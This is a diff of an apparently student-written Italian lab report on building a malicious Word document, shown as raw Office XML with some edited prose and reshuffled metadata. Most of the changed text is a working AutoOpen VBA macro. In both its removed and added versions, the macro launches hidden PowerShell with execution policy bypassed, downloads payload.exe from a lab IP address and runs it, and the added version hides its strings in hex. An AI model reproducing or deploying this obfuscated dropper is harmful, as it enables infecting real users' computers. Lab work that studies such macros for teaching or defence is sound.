+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>macchina</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Windows </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>fornita</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>lezione</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> e ho </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>scaricato</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> il </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>pachetto</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Office con </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>l’account</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>accademico</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Le due machine </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -3525,15 +3669,13 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> rete </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nat</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> il cui </w:t>
+        <w:t xml:space="preserve"> rete</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> con</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> nat il cui </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -4871,27 +5013,6 @@
 </file>
 
 <file path=customXml/item1.xml><?xml version="1.0" encoding="utf-8"?>
-<?mso-contentType ?>
-<FormTemplates xmlns="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms">
-  <Display>DocumentLibraryForm</Display>
-  <Edit>DocumentLibraryForm</Edit>
-  <New>DocumentLibraryForm</New>
-</FormTemplates>
-</file>
-
-<file path=customXml/item2.xml><?xml version="1.0" encoding="utf-8"?>
-<p:properties xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:pc="http://schemas.microsoft.com/office/infopath/2007/PartnerControls">
-  <documentManagement>
-    <_activity xmlns="b8df6df5-3fad-46ca-9360-c9ec0c0b036b" xsi:nil="true"/>
-  </documentManagement>
-</p:properties>
-</file>
-
-<file path=customXml/item3.xml><?xml version="1.0" encoding="utf-8"?>
-<b:Sources xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" SelectedStyle="\APASixthEditionOfficeOnline.xsl" StyleName="APA" Version="6"/>
-</file>
-
-<file path=customXml/item4.xml><?xml version="1.0" encoding="utf-8"?>
 <ct:contentTypeSchema xmlns:ct="http://schemas.microsoft.com/office/2006/metadata/contentType" xmlns:ma="http://schemas.microsoft.com/office/2006/metadata/properties/metaAttributes" ct:_="" ma:_="" ma:contentTypeName="Documento" ma:contentTypeID="0x01010003AD22B01210FE489D9BE433888FACA9" ma:contentTypeVersion="16" ma:contentTypeDescription="Creare un nuovo documento." ma:contentTypeScope="" ma:versionID="09fad2276ea52fc6ec20be57fa2916a4">
   <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="b8df6df5-3fad-46ca-9360-c9ec0c0b036b" xmlns:ns4="f1c65361-0737-4e30-bb3a-9e2ed6feafec" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="2cd1dbdccf64e950842932f53b8e29c6" ns3:_="" ns4:_="">
     <xsd:import namespace="b8df6df5-3fad-46ca-9360-c9ec0c0b036b"/>
@@ -5132,33 +5253,28 @@
 </ct:contentTypeSchema>
 </file>
 
-<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{859E04BA-8E15-4F75-971E-EF4D12FD5774}">
-  <ds:schemaRefs>
-    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
-  </ds:schemaRefs>
-</ds:datastoreItem>
+<file path=customXml/item2.xml><?xml version="1.0" encoding="utf-8"?>
+<b:Sources xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" SelectedStyle="\APASixthEditionOfficeOnline.xsl" StyleName="APA" Version="6"/>
 </file>
 
-<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{2E3BB391-AD20-4994-9E9B-D3F6C61061F0}">
-  <ds:schemaRefs>
-    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
-    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
-    <ds:schemaRef ds:uri="b8df6df5-3fad-46ca-9360-c9ec0c0b036b"/>
-  </ds:schemaRefs>
-</ds:datastoreItem>
+<file path=customXml/item3.xml><?xml version="1.0" encoding="utf-8"?>
+<p:properties xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:pc="http://schemas.microsoft.com/office/infopath/2007/PartnerControls">
+  <documentManagement>
+    <_activity xmlns="b8df6df5-3fad-46ca-9360-c9ec0c0b036b" xsi:nil="true"/>
+  </documentManagement>
+</p:properties>
 </file>
 
-<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{38D7A4B1-5AA0-4687-ADA6-A38D425A54D8}">
-  <ds:schemaRefs>
-    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
-  </ds:schemaRefs>
-</ds:datastoreItem>
+<file path=customXml/item4.xml><?xml version="1.0" encoding="utf-8"?>
+<?mso-contentType ?>
+<FormTemplates xmlns="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms">
+  <Display>DocumentLibraryForm</Display>
+  <Edit>DocumentLibraryForm</Edit>
+  <New>DocumentLibraryForm</New>
+</FormTemplates>
 </file>
 
-<file path=customXml/itemProps4.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
 <ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{F74C8422-D422-4F67-B8D4-238A7F7173C7}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/contentType"/>
@@ -5175,4 +5291,30 @@
     <ds:schemaRef ds:uri="http://schemas.microsoft.com/internal/obd"/>
   </ds:schemaRefs>
 </ds:datastoreItem>
+</file>
+
+<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{38D7A4B1-5AA0-4687-ADA6-A38D425A54D8}">
+  <ds:schemaRefs>
+    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
+  </ds:schemaRefs>
+</ds:datastoreItem>
+</file>
+
+<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{2E3BB391-AD20-4994-9E9B-D3F6C61061F0}">
+  <ds:schemaRefs>
+    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
+    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
+    <ds:schemaRef ds:uri="b8df6df5-3fad-46ca-9360-c9ec0c0b036b"/>
+  </ds:schemaRefs>
+</ds:datastoreItem>
+</file>
+
+<file path=customXml/itemProps4.xml><?xml version="1.0" encoding="utf-8"?>
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{859E04BA-8E15-4F75-971E-EF4D12FD5774}">
+  <ds:schemaRefs>
+    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
+  </ds:schemaRefs>
+</ds:datastoreItem>
 </file>
--- a/Report_MalDoc.docx
+++ b/Report_MalDoc.docx
@@ -89,42 +89,25 @@
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="it-IT"/>
         </w:rPr>
         <w:t>Email</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="it-IT"/>
         </w:rPr>
         <w:t xml:space="preserve"> christian.farina@studenti.univr.it</w:t>
       </w:r>
     </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
+    <w:p/>
+    <w:p/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Titolo1"/>
@@ -1854,82 +1837,42 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>Nel codice offuscato ho inserito solo il metodo principale (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>AutoOpen</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">) passando al decodificatore direttamente le stringhe codificate in base64, in questo modo ho potuto eliminare </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>i</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> due metodi responsabili della codifica delle stringhe. Per offuscare il codice ho usato VBA </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>Obfuscator</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> e ho diviso </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>i</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> comandi </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>powershell</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> in due stringhe, per aumentare la confusione.</w:t>
+      <w:r>
+        <w:t xml:space="preserve">Const </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ooezovykprtt</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = 2</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Const </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>aqmjwdobeoqj</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = 1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Const </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ehtsfjs</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = 0</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1947,32 +1890,93 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Dim v38d2edd4076bb66acc2ee1b42bdb2336 As String</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Dim vr4573k99768ffgruighfjkgbgvghjjhg As String</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Dim ca9d601c97cef483411de079bb9a3419b As String</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Dim jytfk6877hnhhjj89ong6rbgfghj66879 As String</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Dim m758f0834b3c6499700addb9b25f64906 As Object</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Set m758f0834b3c6499700addb9b25f64906 = </w:t>
+        <w:t xml:space="preserve">Dim </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>lsqusheic</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> As String</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Dim </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>gcgrrlkyyn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> As String</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Dim </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>hbwgdnzhgeyo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> As String</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Dim </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ajkquovldiyoumav</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> As String</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Dim </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>vmfosuiwtjww</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> As String</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Dim </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>tzicbtrtaod</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> As Object</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Set </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>tzicbtrtaod</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -1980,115 +1984,461 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t>("</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>WScript.Shell</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>")</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">jytfk6877hnhhjj89ong6rbgfghj66879 </w:t>
-      </w:r>
-      <w:r>
-        <w:t>= "powershell.exe -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>NoProfile</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ExecutionPolicy</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Bypass -Command "</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>v38d2edd4076bb66acc2ee1b42bdb2336 = "IEX([</w:t>
-      </w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:proofErr w:type="gramStart"/>
       <w:r>
-        <w:t>System.Text.Encoding</w:t>
+        <w:t>twnukwpmlvzmxls</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
-        <w:t>]::UTF8.GetString([System.Convert]::FromBase64String('BASE64_ENCODED_COMMAND')))"</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">vr4573k99768ffgruighfjkgbgvghjjhg = </w:t>
-      </w:r>
+        <w:t xml:space="preserve">"57536372") &amp; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>twnukwpmlvzmxls</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>("6970742e5368656c6c"))</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>hbwgdnzhgeyo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = twnukwpmlvzmxls("494558285b53797374656d2e546578742e456e636f64696e675d3a3a555446382e476574537472696e67285b53797374656d2e436f6e766572745d3a3a46726f6d426173653634") &amp; twnukwpmlvzmxls("537472696e6728274241534536345f454e434f4445445f434f4d4d414e4427292929")</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>ajkquovldiyoumav</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:proofErr w:type="gramStart"/>
       <w:r>
-        <w:t>Replace(</w:t>
-      </w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>Replace</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
-        <w:t>v38d2edd4076bb66acc2ee1b42bdb2336, "BASE64_ENCODED_COMMAND", "</w:t>
-      </w:r>
-      <w:r>
-        <w:t>KE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRGaWxlKCdodHRwOi8vMTkyLjE2OC40My4yMDk6ODAwMC9wYXlsb2FkLmV4ZScsICdDOlxVc2Vyc1xtYWx3YXJlXERvd25sb2Fkc1x2aXJ1cy5leGUnKQ==</w:t>
-      </w:r>
-      <w:r>
-        <w:t>")</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">ca9d601c97cef483411de079bb9a3419b = </w:t>
-      </w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>hbwgdnzhgeyo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>twnukwpmlvzmxls</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">("4241534536345f") &amp; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>twnukwpmlvzmxls</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">("454e434f4445445f434f4d4d414e44"), </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>twnukwpmlvzmxls</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>("4b45") &amp; twnukwpmlvzmxls("356c64793150596d706c59335167546d56304c6c646c596b4e736157567564436b7552473933626d7876595752476157786c4b43646f644852774f6938764d546b794c6a45324f4334784c6a45774f6a67774d44417663474635624739685a43356c6547556e4c43416e517a706356584e6c636e4e6359334a706333526352473933626d78765957527a58485a70636e567a4c6d56345a536370"))</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>vmfosuiwtjww</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:proofErr w:type="gramStart"/>
       <w:r>
-        <w:t>Replace(</w:t>
-      </w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>Replace</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
-        <w:t>v38d2edd4076bb66acc2ee1b42bdb2336, "BASE64_ENCODED_COMMAND", "ICYgJ0M6XFVzZXJzXGNyaXN0XERvd25sb2Fkc1x2aXJ1cy5leGUn")</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>m758f0834b3c6499700addb9b25f64906.Run jytfk6877hnhhjj89ong6rbgfghj66879 &amp; " &amp; " &amp; vr4573k99768ffgruighfjkgbgvghjjhg, 0, True</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>m758f0834b3c6499700addb9b25f64906.Run jytfk6877hnhhjj89ong6rbgfghj66879 &amp; " &amp; " &amp; ca9d601c97cef483411de079bb9a3419b, 0, True</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Set m758f0834b3c6499700addb9b25f64906 = Nothing</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>End Sub</w:t>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>hbwgdnzhgeyo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>twnukwpmlvzmxls</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">("4241534536") &amp; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>twnukwpmlvzmxls</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">("345f454e434f4445445f434f4d4d414e44"), </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>twnukwpmlvzmxls</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>("494359674a304d365846") &amp; twnukwpmlvzmxls("567a5a584a7a58474e7961584e3058455276643235736232466b6331783261584a316379356c6547556e"))</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>tzicbtrtaod.Run</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> twnukwpmlvzmxls("706f7765727368656c6c2e657865202d4e6f50726f66696c6520") &amp; twnukwpmlvzmxls("2d457865637574696f6e506f6c69637920427970617373202d436f6d6d616e6420") &amp; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>ajkquovldiyoumav</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>ehtsfjs</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>, True</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
